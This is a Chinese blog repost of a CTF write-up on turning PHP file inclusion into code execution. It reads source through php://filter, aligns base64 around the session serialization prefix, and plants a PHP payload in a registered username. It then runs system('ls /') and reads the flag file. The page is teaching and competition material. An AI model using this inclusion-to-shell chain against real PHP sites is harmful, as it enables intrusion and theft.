php文件包含session,CTF PHP文件包含--session

最新推荐文章于 2023-07-30 15:15:30 发布
最新推荐文章于 2023-07-30 15:15:30 发布
阅读量787 收藏 4
点赞数
文章标签: php文件包含session

PHP文件包含 Session

首先了解一下PHP文件包含漏洞----包含session

利用条件:session文件路径已知,且其中内容部分可控。

姿势:

php的session文件的保存路径可以在phpinfo的session.save_path看到。

aa82029e9a95620b37c71f8233fa9780.png

常见的php-session存放位置:

/var/lib/php/sess_PHPSESSID

/var/lib/php/sess_PHPSESSID

/tmp/sess_PHPSESSID

/tmp/sessions/sess_PHPSESSID

session 的文件名格式为 sess_[phpsessid]。而 phpsessid 在发送的请求的 cookie 字段中可以看到。

aa15ee33f9545374bf1610d0633251b1.png

要包含并利用的话,需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候,可以先包含进session文件,观察里面的内容,然后根据里面的字段来发现可控的变量,从而利用变量来写入payload,并之后再次包含从而执行php代码。

题目:

http://54.222.188.152:22589/

b7fda9692a0e339a1da2adec89123cb9.png

解题思路:

php伪协议读取源码

点击login,发现链接变为:

http://54.222.188.152:22589/index.php

?action=login.php

首先读取 login.php 的源码

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=login.php

得到login.php源码:

require_once('config.php');

session_start();if($_SESSION['username']) {

header('Location: index.php');

exit;

}if($_POST['username'] && $_POST['password']) {

$username= $_POST['username'];

$password= md5($_POST['password']);

$mysqli=@new mysqli($dbhost, $dbuser, $dbpass, $dbname);if ($mysqli->connect_errno) {

die("could not connect to the database:\n" . $mysqli->connect_error);

}

$sql= "select password from user where username=?";

$stmt= $mysqli->prepare($sql);

$stmt->bind_param("s", $username);

$stmt->bind_result($res_password);

$stmt->execute();

$stmt->fetch();if ($res_password ==$password) {

$_SESSION['username'] =base64_encode($username);

header("location:index.php");

}else{

die("Invalid user name or password");

}

$stmt->close();

$mysqli->close();

}else{

?>

Login

"static/bootstrap.min.css" rel="stylesheet">

class="container" style="margin-top:100px">

"login.php" method="post" class="well" style="width:220px;margin:0px auto;">

Login

Username:

"text" name="username" style="height:30px"class="span3"/>

Password:

"password" name="password" style="height:30px" class="span3">

"submit" class="btn btn-primary">LOGIN

}

?>

读取 register.php 的源码

访问:

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=register.php

得到源码:

require_once('config.php');

$username= $_POST['username'];

$password= md5($_POST['password']);

$mysqli=@new mysqli($dbhost, $dbuser, $dbpass, $dbname);if ($mysqli->connect_errno) {

die("could not connect to the database:\n" . $mysqli->connect_error);

}

$mysqli->set_charset("utf8");

$sql= "select * from user where username=?";

$stmt= $mysqli->prepare($sql);

$stmt->bind_param("s", $username);

$stmt->bind_result($res_id, $res_username, $res_password);

$stmt->execute();

$stmt->store_result();

$count= $stmt->num_rows();if($count) {

die('User name Already Exists');

}else{

$sql= "insert into user(username, password) values(?,?)";

$stmt= $mysqli->prepare($sql);

$stmt->bind_param("ss", $username, $password);

$stmt->execute();

echo'Register OK!Please Login';

}

$stmt->close();

$mysqli->close();

}else{

?>

Login

"static/bootstrap.min.css" rel="stylesheet">

class="container" style="margin-top:100px">

"register.php" method="post" class="well" style="width:220px;margin:0px auto;">

Register

Username:

"text" name="username" style="height:30px"class="span3"/>

Password:

"password" name="password" style="height:30px" class="span3">

"submit" class="btn btn-primary">REGISTER

}

?>

读取 config.php 的源码

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=config.php

得到源码:

$dbhost= 'localhost';

$dbuser= 'web';

$dbpass= 'webpass123';

$dbname= 'web';

?>

读取 index.php 的源码

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-encode/resource=index.php

源码:

error_reporting(0);

session_start();if (isset($_GET['action'])) {

include $_GET['action'];

exit();

}else{

?>

"en">

"utf-8">

Login

"viewport" content="width=device-width, initial-scale=1.0">

"css/bootstrap.css" rel="stylesheet" media="screen">

"css/main.css" rel="stylesheet" media="screen">

?php

}

?>

解题分析:

拿到了源码,首先进行简单的审计一下。

SQL注入?:

有登陆页面,不知道会不会有注入,简单看一下。

往往注册与登陆操作中会有与数据库交互的地方,这也是sql注入的常见引发点。

看一下register.php,这里仅截取部分代码:

#register.php

$mysqli->set_charset("utf8");

$sql= "select * from user where username=?";

$stmt= $mysqli->prepare($sql);

$stmt->bind_param("s", $username);

$stmt->bind_result($res_id, $res_username, $res_password);

$stmt->execute();

$stmt->store_result();

再看一下login.php:

#login.php

$sql = "select password from user where username=?";

$stmt= $mysqli->prepare($sql);

$stmt->bind_param("s", $username);

$stmt->bind_result($res_password);

$stmt->execute();

$stmt->fetch();

这里都使用了PHP的PDO处理,因此这里存在sql注入的可能性很小。

session

接着再看看,有哪些参数是可控的。

在login.php中:

#第3行

session_start();if($_SESSION['username']) {

header('Location: index.php');

exit;

}#第8行

if($_POST['username'] && $_POST['password']) {

$username= $_POST['username'];#第20行

$stmt->bind_result($res_password);#第24行

if ($res_password ==$password) {

$_SESSION['username'] =base64_encode($username);

header("location:index.php");

这里使用了session来保存用户会话,php手册中是这样描述的:

PHP 会将会话中的数据设置到 $_SESSION 变量中。

当 PHP 停止的时候,它会自动读取 $_SESSION 中的内容,并将其进行序列化,然后发送给会话保存管理器来进行保存。

对于文件会话保存管理器,会将会话数据保存到配置项 session.save_path 所指定的位置。

考虑到变量$username是我们可控的,并且被设置到了$_SESSION中,因此我们输入的数据未经过滤的就被写入到了对应的sessioin文件中。结合前面的php文件包含,可以推测这里可以包含session文件。

要包含session文件,需要知道文件的路径。先注册一个用户,比如chybeta。等登陆成功后。记录下cookie中的PHPSESSID的值,这里为udu8pr09fjvabtoip8icgurt85

c2c5a1ca4bf5c3dca3f336811a974fe0.png

访问:

http://54.222.188.152:22589/index.php?action=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85

1fb30506c77109477af2d7acb5d1dd78.png

这个/var/lib/php5/的session文件路径是测试出来的,常见的也就是上面所述的几种。

base64_encode

能包含,并且控制session文件,但要写入可用的payload,还需要绕过:

$_SESSION['username'] = base64_encode($username);

如前面所示,输入的用户名会被base64加密。如果直接用php伪协议来解密整个session文件,由于序列化的前缀,势必导致乱码。

考虑一下base64的编码过程。比如编码abc。

未编码: abc

转成ascii码:97 98 99转成对应二进制(三组,每组8位):01100001 01100010 01100011重分组(四组,每组6位):011000 010110 001001 100011每组高位补零,变为每组8位:00011000 00010110 00001001 00100011每组对应转为十进制:24 22 9 35查表得: Y W J j

考虑一下session的前缀:username|s:12:",中间的数字12表示后面base64串的长度。当base64串的长度小于100时,前缀的长度固定为15个字符,当base64串的长度大于100小于1000时,前缀的长度固定为16个字符。

由于16个字符,恰好满足一下条件:

16个字符 => 16 * 6 = 96 位 => 96 mod 8 = 0

也就是说,当对session文件进行base64解密时,前16个字符固然被解密为乱码,但不会再影响从第17个字符后的部分也就是base64加密后的username。

Getflag

注册一个账号,比如:

chybetachybetachybetachybetachybetachybetachybetachybetachybeta'atebyhc']) ?>

其base64加密后的长度为128,大于100。

27fe00692059487fde7201d4cb8f2bf1.png

http://54.222.188.152:22589/index.php

?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85&atebyhc=phpinfo();

e57b44a3bd2f82c2abdbafa1f6e7bb42.png

成功getshell。

访问:

http://54.222.188.152:22589/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85&atebyhc=system('ls /');

2e5551034b9fdd7ec9f4a2708f52817d.png

访问:

http://54.222.188.152:22589/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_udu8pr09fjvabtoip8icgurt85&atebyhc=system('cat /fffflllllaaaagggg.txt');

511f34e059e9a93b87bba5851d04b7b3.png

小结

考了几个知识点:

php文件包含:伪协议利用

php文件包含:包含session文件

php-session知识及序列化格式

base64的基本原理

原文链接(https://chybeta.github.io/2017/11/09/%E4%B8%80%E9%81%93CTF%E9%A2%98%EF%BC%9APHP%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/)

任重而道远!

weixin_39522423
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP课程整理
Autovy blog
02-02 233
PHP要点整理
php文件包含读源码,CTF PHP文件包含--session
weixin_30045711的博客
03-12 620
PHP文件包含 Session首先了解一下PHP文件包含漏洞----包含session利用条件:session文件路径已知,且其中内容部分可控。姿势:phpsession文件的保存路径可以在phpinfo的session.save_path看到。常见的php-session存放位置:/var/lib/php/sess_PHPSESSID/var/lib/php/sess_PHPSESSID/tm...
CTF PHP文件包含--session
weixin_30613727的博客
12-21 1459
PHP文件包含 Session 首先了解一下PHP文件包含漏洞----包含session 利用条件:session文件路径已知,且其中内容部分可控。 姿势: phpsession文件的保存路径可以在phpinfo的session.save_path看到。 常见的php-session存放位置: /var/lib/php/sess_PHPSESSID /var/lib/php/s...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于HTTP的挑战从端口8000开始,tcp挑战从端口9000开始 如果您不熟悉Docker,则在本文档底部介绍两个用于安装docker的选项。 挑战性 现场挑战标有* 挑战名称 类别 点数 easyauth 网页 30 大号1 网页 20 尊宝2 网页 100 zumboa 3 网页 250 德尔福状态 加密/网络 250 2000年 网页 100 简单的 倒车 10 船长 倒车 75 船长2 倒车 200 撤防 倒车 400 标记接收器 移动/倒车
flask-session-cookie-manager-master.zip
09-05
CTFsession伪造脚本,有解密和加密的,一定要有私钥才能进行。
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile及sql文件的过渡会做适当的修改(或者重写,因为有的过渡按给的文件运行不起来。。可能是我打开的方式不对),对于大部分没有的版本,会自己编写(复制粘贴)提供相应的文件 如有bug,还望知道 建造 每道译文对应的端口需要自行在run脚本中更改 cd the_challenge chmod 777 build run ./build ./run 分类 SQLi RCE XSS SSRF 未盐化 文件包含 XXE 科学技术研究院
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战 使用PHP在Web中进行CTF挑战 链接: :
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1502
点开就是源代码,直接进行代码审计
ctfshow 反序列化2
qq_61768489的博客
07-13 360
PHPsession反序列化 带你走进PHP session反序列化漏洞 - 先知社区 原理解释不错 CTFshow-web入门-反序列化_哔哩哔哩_bilibili 可参考CTFshow 反序列化 web263_Kradress的博客-CSDN博客 在index.php中 的键值写错了,那就可以通过COOKIE来控制的值,从而进行当前页面的反序列化在check.php中,引用了inc.php 在inc.php中出现关键函数可以写入文件 构造payload 开始构造payload: 从关键的
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1872
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
html会显示if else,if else构造html中的值属性的问题
weixin_30555169的博客
07-01 498
public function getEmployeeId() {if (!isset($_SESSION["email"]) || !isset($_SESSION["passwrd"])) {header("Location:index.php");// Cannot Access this page without Login.}if (empty($_POST)){$_SESSION['i...
CTF-misc工具2-CTF-Tools-masterV1.3.7
最新发布
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码编码类型的功能,大大减少手工判断和重复尝试的时间,使密码解码更为便捷高效。
ctfshow web11详解,小白补充sessionPHPSESSID相关知识
weixin_73562787的博客
07-30 247
当用户访问php网址时,服务器会将生成的PHPSESSID值发送给用户的浏览器,并保存在名为PHPSESSID的cookie中,浏览器在随后的请求中会自动将这个cookie发送回服务器,这样,服务器可以通过这个唯一的标识符识别用户,并获取与用户关联的会话数据。PHPSESSID cookie的值是随机生成的,并且大部分情况下是基于用户的会话信息和一些其他参数生成的哈希值,这样做是为了确保PHPSESSID的唯一性和安全性,以防会话劫持和其他安全漏洞。的,通常以文件或数据库的形式保存。
ctf笔记:php
TengChuanB的博客
12-16 1292
ctf php
CTFweb篇-Session包含
weixin_44597701的博客
08-07 3688
什么是Session Session就是保存在服务器的文本文件。 默认情况下,PHP.ini 中设置的 SESSION 保存方式是 files(session.save_handler = files),即使用读写文件的方式保存 SESSION 数据,而 SESSION 文件保存的目录由 session.save_path 指定,文件名以 sess_ 为前缀,后跟 SESSION ID,如:sess_c72665af28a8b14c0fe11afe3b59b51b。文件中的数据即是序列化之后的 SESSIO
php session举例,phpsession的简单例子
weixin_39806603的博客
03-24 150
以下代码是phpsession操作的例子。注意:session_start语句必须放在代码的第一行。例子:1,session1.phpsession_start();?>/p>"http://www.w3.org/TR/html4/strict.dtd">session示例-www.jbxue.comphp sessionPHPSESSID = 点击下一页,即可看到访问者的se...
CTFPHP常见漏洞及利用(未完待续)
qq_34106499的博客
01-25 4881
总结ctf中出现的php漏洞及利用
CTF入门之旅(四)
qinyuehong的博客
03-29 205
今天解决的题目是一道脚本题:手机验证码的爆破及图片验证码的识别。 题目:http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php# 1、需要获取该网址的cookie。 Cookie是某些网站为了辨别用户身份而保存在用户本地的加密数据。有时候我们可能会需要获取Cookie进行操作。下面讲解一下Chrome浏览器如何获取Cookie。 鼠标右击-》检查-》Network,进入如下页面: 按照上图红框所示,点击filter
php 命令执行中 PHPSESSID 妙用
y0un9er
10-02 7596
之前刷CTF的时候,遇到一个命令执行的题,看大佬的WP是通过PHPSESSID传值,绕过waf,最近有时间复现了一下。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值